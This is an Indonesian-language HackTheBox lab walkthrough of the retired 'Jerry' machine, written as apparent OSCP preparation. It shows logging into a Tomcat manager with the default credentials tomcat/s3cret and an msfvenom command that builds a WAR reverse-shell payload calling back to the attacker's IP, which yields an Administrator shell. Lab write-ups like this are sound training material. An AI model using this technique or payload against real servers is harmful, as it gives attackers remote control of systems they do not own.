HACKTHEBOX WALKTROUGH

Jerry Machines

CVE-CWE N/A (Without Metasploit)

Trimakasih sudah meluangkan waktu untuk membaca artikel ini. Saat ini penulis menghadapi mesin retired HTB “Jerry” yang dimana total ada 72 mesin retired setelah penulis memperbarui list target penulis yang terdapat pada list netsecfocus, dan penulis akan menempuh list target tersebut dan di dokumentasikan di akun medium ini.

Semoga pembaca semakin diberkahi dan ditingkatkan keilmuannya, serta selalu tercapai setiap tujuan dan cita-citanya atas Kehendak-Nya, juga yang sedang menempuh sertifikasi OSCP semoga tercapai dan sukses total, Aamiin. Full list mesin retired HTB oleh netsecfocus dapat di akses disini.

Reconnaissance

Penulis memulai dengan melakukan reconnaissance terhadap server target menggunakan nmap.

8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1

Dan diketahui bahwa pada server target hanya terdapat 1 port terbuka di 8080 dengan menggunakan service apache tomcat.

Enumeration

Dikarenakan service tersebut adalah http, penulis meng-akses port tersebut pada firefox browser tepatnya di url http://10.10.10.95:8080/

Gambar 1

Seperti terlihat di Gambar 1, bahwa ini adalah tampilan index dari halaman apache tomcat/7.0.88 .

Kemudian penulis klik menu “Manager App” dan terdapat http authentication, dikarenakan penulis belum mengetahui user dan password, lalu penulis di redirect ke halaman berikut.

Gambar 2

Pada Gambar 2 diketahui username dan password dari tomcat. Kemudian penulis mencoba credentials tersebut untuk login pada http authentication.

Gambar 3

username : tomcat
password : s3cret

Gambar 4

Penulis berhasil masuk ke dashboard ‘Tomcat Web Application Manager’.

Administrator Shell

Kemudian penulis hanya perlu melakukan reverse shell dengan sebelumnya membuat dan melakukan upload terdahap payload dengan extension (*.war).

msfvenom -p java/shell_reverse_tcp lhost=10.10.14.4 lport=321 -f war -o pwn.war

Setelah payload pwn.war sudah dibuat oleh penulis, penulis hanya perlu melakukan upload payload pwn.war yang sebelumnya penulis sudah menjalankan listener dengan ncat tepatnya pada port 321.

Gambar 5

Penulis berhasil mendapatkan session. Pada kasus ini, penulis tidak perlu melakukan privilege escalation, dikarenakan penulis sudah langsung mendapatkan shell dengan user Administrator.

Gambar 6

Seperti terlihat di Gambar 6 bahwa flag user.txt dan root.txt terdapat pada di direktori yang sama.

Kesimpulan

Ini merupakan teknik lama terhadap payload dengan extension (*.war) namun penulis akan mendapatkan sedikit tantangan apabila user dan password untuk dashboard tomcat harus ditemukan dengan menggunakan teknik bruteforce berdasarkan wordlist.

Reference

How to Hack Apache Tomcat via Malicious WAR File Upload

Target

45 mesin lagi !